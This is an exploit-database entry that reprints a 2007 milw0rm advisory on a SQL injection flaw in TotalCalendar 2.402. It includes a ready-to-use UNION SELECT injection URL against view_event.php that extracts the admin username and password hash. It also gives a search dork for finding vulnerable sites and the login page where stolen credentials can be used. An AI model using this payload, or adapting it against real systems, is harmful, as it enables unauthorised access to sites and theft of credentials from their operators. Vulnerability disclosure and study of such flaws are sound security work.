TotalCalendar 2.402 SQL Injection Vulnerability

vendor:

TotalCalendar

by:

t0pP8uZz & xprog

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: TotalCalendar

Affected Version From: 2.402

Affected Version To: 2.402

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

TotalCalendar 2.402 SQL Injection Vulnerability

Remote SQL injection in view_event.php id, able to pull admin username/md5hash.

Mitigation:

Update to a version that does not have the SQL injection vulnerability.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+                TotalCalendar 2.402 SQL Injection Vulnerability                 +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://sweetphp.com/nuke/index.php
DORK: allintext:"Powered by: TotalCalendar"

DESCRIPTION:
Remote SQL injection in view_event.php id, able to pull admin username/md5hash. 

EXPLOIT:
http://site.com/calender/path/view_event.php?id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,pw),5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/tcal_users/**/WHERE/**/uid=1/*

Tip/Note:
Login is in /auth.php?action=login
Older versions of this script are using magic quotes, while the newest is not.
The module version (ie: modules.php?name=totalcalendar) of this script has the vulnerabilities but php-nuke never lets them reach the module.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+                TotalCalendar 2.402 SQL Injection Vulnerability                 +==--
--==+================================================================================+==--

# milw0rm.com [2007-06-30]